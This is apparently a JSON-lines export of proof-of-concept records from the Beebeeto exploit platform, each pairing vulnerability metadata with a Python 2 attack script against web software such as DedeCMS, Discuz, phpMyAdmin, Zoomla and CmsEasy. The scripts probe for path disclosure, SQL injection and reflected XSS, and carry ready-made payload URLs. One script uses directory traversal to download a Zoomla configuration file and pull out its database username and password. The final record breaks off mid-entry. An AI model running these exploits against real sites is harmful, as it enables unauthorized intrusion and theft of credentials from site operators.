{"create_date": "2014-10-19 16:26:45", "name": "Dedecms v5.5 full Path Disclosure Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Dedecms\u4fe1\u606f\u6cc4\u9732,Dedecms\u7206\u8def\u5f84,5.5\u8def\u5f84\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0084',\r\n 'name': 'Dedecms v5.5 full Path Disclosure Vulnerability POC',\r\n 'author': '\u5c0f\u9a6c\u7532',\r\n 'create_date': '2014-10-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Dedecms',\r\n 'vul_version': ['5.5'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Dedecms\u4fe1\u606f\u6cc4\u9732', 'Dedecms\u7206\u8def\u5f84', '5.5\u8def\u5f84\u6cc4\u9732'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.myhack58.com/Article/html/3/62/2010/26804.htm',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_list = ['/plus/paycenter/alipay/return_url.php',\r\n '/plus/paycenter/cbpayment/autoreceive.php',\r\n '/plus/paycenter/nps/config_pay_nps.php',\r\n '/plus/task/dede-maketimehtml.php',\r\n '/plus/task/dede-optimize-table.php',]\r\n args['poc_ret']['file_path'] = []\r\n for filename in file_list:\r\n verify_url = args['options']['target'] + filename\r\n try:\r\n if args['options']['verbose']:\r\n print '[*] Requst URL: ' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n except:\r\n continue\r\n if '<b>Fatal error</b>:' 
in content and '.php</b>' in content:\r\n if 'on line <b>' in content:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(verify_url)\r\n if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "DedeCms", "id": "poc-2014-0084", "layer4_protocol": null}
{"create_date": "2014-10-19 16:12:46", "name": "phpmyadmin /themes/darkblue_orange/layout.inc.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "phpmyadmin\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,/layout.inc.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0083',\r\n 'name': 'phpmyadmin /themes/darkblue_orange/layout.inc.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC',\r\n 'author': '\u5c0f\u9a6c\u7532',\r\n 'create_date': '2014-10-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpmyadmin',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['phpmyadmin\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', '/layout.inc.php'],\r\n 'desc': 'phpmyadmin\u7206\u8def\u5f84\u65b9\u6cd5 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php',\r\n 'references': ['http://huaidan.org/archives/1642.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n paths = ['/', '/phpmyadmin/']\r\n payload = '/source/plugin/myrepeats/table/table_myrepeats.php'\r\n for path in paths:\r\n verify_url = args['options']['target'] + path + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n except:\r\n continue\r\n 
if 'getImgPath()' in content and 'Fatal error:' and 'on line' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "phpmyadmin\u7206\u8def\u5f84\u65b9\u6cd5 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php", "app_name": "PHPMyAdmin", "id": "poc-2014-0083", "layer4_protocol": null}
{"create_date": "2014-10-18 22:15:15", "name": "Discuz x2.5 /source/plugin/myrepeats/table/table_myrepeats.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,/table_myrepeats.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0082',\r\n 'name': 'Discuz x2.5 /source/plugin/myrepeats/table/table_myrepeats.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC',\r\n 'author': '1024',\r\n 'create_date': '2014-10-18',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['x2.5'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Discuz\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', '/table_myrepeats.php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.2cto.com/Article/201211/171301.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/source/plugin/myrepeats/table/table_myrepeats.php'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<b>Fatal error</b>:' in content and '/table_myrepeats.php</b>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return 
args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Discuz", "id": "poc-2014-0082", "layer4_protocol": null}
{"create_date": "2014-10-17 22:50:56", "name": "Discuz x2 /source/function/function_connect.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,/function_connect.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0076',\r\n 'name': 'Discuz x2 /source/function/function_connect.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC',\r\n 'author': '1024',\r\n 'create_date': '2014-10-17',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['x2.0'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Discuz\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', '/function_connect.php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://sebug.net/vuldb/ssvid-24254',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/source/function/function_connect.php'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<b>Fatal error</b>:' in content and '/function_connect.php</b>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ 
== '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "N/A", "app_name": "Discuz", "id": "poc-2014-0076", "layer4_protocol": null}
{"create_date": "2014-10-17 17:00:37", "name": "Discuz X2.5 full Path Disclosure Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u4fe1\u606f\u6cc4\u9732,Discuz\u7206\u8def\u5f84,X2.5\u8def\u5f84\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0075',\r\n 'name': 'Discuz X2.5 full Path Disclosure Vulnerability POC',\r\n 'author': '1024',\r\n 'create_date': '2014-10-17',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['2.5'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Discuz\u4fe1\u606f\u6cc4\u9732', 'Discuz\u7206\u8def\u5f84', 'X2.5\u8def\u5f84\u6cc4\u9732'],\r\n 'desc': '''\r\n Discuz! 
X2.5 /api.php\u6587\u4ef6\u4e2d\u7531\u4e8earray_key_exists\u4e2d\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570\u53ea\u80fd\u4e3a\u6574\u6570\u6216\u8005\u5b57\u7b26\u4e32\uff0c\r\n \u5f53?mod[]=beebeeto\u65f6\uff0c$mod\u7c7b\u578b\u4e3aarray\uff0c\u4ece\u800c\u5bfc\u81f4array_key_exists\u4ea7\u751f\u9519\u8bef\u4fe1\u606f\u3002\r\n ''',\r\n 'references': ['http://www.cnseay.com/archives/2353',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_list = ['/api.php','/uc_server/control/admin/db.php','/install/include/install_lang.php']\r\n args['poc_ret']['file_path'] = []\r\n for filename in file_list:\r\n verify_url = args['options']['target'] + filename + '?mod[]=beebeeto'\r\n try:\r\n if args['options']['verbose']:\r\n print '[*] Requst URL: ' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n except:\r\n continue\r\n if 'Warning:' in content and 'array_key_exists():' in content:\r\n if '.php on line' in content:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(verify_url)\r\n if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Discuz! X2.5 /api.php\u6587\u4ef6\u4e2d\u7531\u4e8earray_key_exists\u4e2d\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570\u53ea\u80fd\u4e3a\u6574\u6570\u6216\u8005\u5b57\u7b26\u4e32\uff0c\u5f53?mod[]=beebeeto\u65f6\uff0c$mod\u7c7b\u578b\u4e3aarray\uff0c\u4ece\u800c\u5bfc\u81f4array_key_exists\u4ea7\u751f\u9519\u8bef\u4fe1\u606f\u3002", "app_name": "Discuz", "id": "poc-2014-0075", "layer4_protocol": null}
{"create_date": "2014-10-17 14:20:44", "name": "Zoomla 2.0 /User/UserZone/School/Download.aspx \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "root", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Zoomla\u6f0f\u6d1e,Arbitary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport math\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0073',# \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'Zoomla 2.0 /User/UserZone/School/Download.aspx \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit', # \u540d\u79f0\r\n 'author': 'root', # \u4f5c\u8005\r\n 'create_date': '2014-10-17', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Zoomla', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['2.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Arbitary File Download ', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['Zoomla\u6f0f\u6d1e', 'Arbitary File Download', ], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'Zoomla X2.0 has Arbitary File Download in /User/UserZone/School/Download.aspx.', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['N/A', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def 
verify(cls, args):\r\n username = \"\"\r\n passwor = \"\"\r\n payload = \"/User/UserZone/School/Download.aspx?f=..\\..\\..\\Config\\ConnectionStrings.config\" \r\n verify_url = args['options']['target'] + payload\r\n response = urllib2.urlopen(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] GET DATA from: ' + verify_url\r\n html = response.read().decode('utf-8')\r\n data = re.compile('User ID=(.*?);Password=(.*?)\"').findall(html)\r\n username = data[0][0]\r\n password = data[0][1]\r\n if username and password :\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['username'] = username\r\n args['poc_ret']['password'] = password\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "Zoomla X2.0 has Arbitary File Download in /User/UserZone/School/Download.aspx.", "app_name": "Zoomla", "id": "poc-2014-0073", "layer4_protocol": null}
{"create_date": "2014-10-16 17:24:01", "name": "DedeCMS 5.7 /wap.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "DedeCMS\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/wap.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0071',\r\n 'name': 'DedeCMS 5.7 /wap.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-10-16',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'DedeCMS',\r\n 'vul_version': ['5.7'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['DedeCMS\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/wap.php'],\r\n 'desc': 'DedeCMS 5.7 /wap.php \u6587\u4ef6sids\u53c2\u6570\u5728\u5f53action\u4e3alist\u65f6\u6ca1\u6709\u5408\u9002\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002',\r\n 'references': ['http://sebug.net/vuldb/ssvid-62607',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/wap.php?action=list&id=392%20test\"\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"Error page: <font color='red'>/wap.php?action=list&id=392%20test</font>\" in content:\r\n if \"Error infos: You have an error in your SQL syntax;\" in content:\r\n if \"typeid in(392 test)\" in content:\r\n args['success'] = True\r\n 
args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "DedeCMS 5.7 /wap.php \u6587\u4ef6sids\u53c2\u6570\u5728\u5f53action\u4e3alist\u65f6\u6ca1\u6709\u5408\u9002\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002", "app_name": "DedeCms", "id": "poc-2014-0071", "layer4_protocol": null}
{"create_date": "2014-10-16 14:37:00", "name": "DedeCMS 5.7 /images/swfupload/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "DedeCMS\u6f0f\u6d1e,Flash XSS\u6f0f\u6d1e,swfupload.swf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0070',\r\n 'name': 'DedeCMS 5.7 /images/swfupload/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': '\u5c0f\u9a6c\u7532',\r\n 'create_date': '2014-10-16',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'DedeCMS',\r\n 'vul_version': ['5.7'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['DedeCMS\u6f0f\u6d1e', 'Flash XSS\u6f0f\u6d1e', 'swfupload.swf'],\r\n 'desc': 'DedeCMS 5.7 /images/swfupload/swfupload.swf\u6587\u4ef6movieName\u53c2\u6570\u6ca1\u6709\u5408\u9002\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u3002',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2010-038593',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"\r\n file_path = \"/images/swfupload/swfupload.swf\"\r\n verify_url = args['options']['target'] + file_path\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in 
flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url + r'?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%221%22%29}}//'\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "DedeCMS 5.7 /images/swfupload/swfupload.swf\u6587\u4ef6movieName\u53c2\u6570\u6ca1\u6709\u5408\u9002\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u3002", "app_name": "DedeCms", "id": "poc-2014-0070", "layer4_protocol": null}
{"create_date": "2014-10-11 16:44:25", "name": "CmsEasy 5.5 /demo.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "cmseasy,xss,\u53cd\u5c04\u578bXSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0063', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'CmsEasy 5.5 /demo.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': '\u5927\u5b69\u5c0f\u5b69', # \u4f5c\u8005\r\n 'create_date': '2014-10-10', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'cmseasy', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['<=5.5'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Cross Site Scripting', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['cmseasy', 'xss', '\u53cd\u5c04\u578bXSS'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'cmseasy /demo.php\u6587\u4ef6\u5b58\u5728xss\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-069363', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + 
\"/demo.php?time=alert('f4aa169c58007f317b2de0b73cecbd92')\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n if \"time:alert('f4aa169c58007f317b2de0b73cecbd92'),\" in content:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "cmseasy /demo.php\u6587\u4ef6\u5b58\u5728xss\u6f0f\u6d1e\u3002", "app_name": "CmsEasy", "id": "poc-2014-0063", "layer4_protocol": null}
{"create_date": "2014-10-11 11:01:09", "name": "waikuCMD /index.php/Search.html \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "foxhack", "rank": 3, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "waikucms,\u4ee3\u7801\u6267\u884c,search.html", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0062',\r\n 'name': 'waikuCMD /index.php/Search.html \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC',\r\n 'author': 'foxhack',\r\n 'create_date': '2014-10-11',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'waikucms',\r\n 'vul_version': ['*'],\r\n 'type': 'Code Execution',\r\n 'tag': ['waikucms', '\u4ee3\u7801\u6267\u884c', 'search.html'],\r\n 'desc': 'Search.html \u53c2\u6570 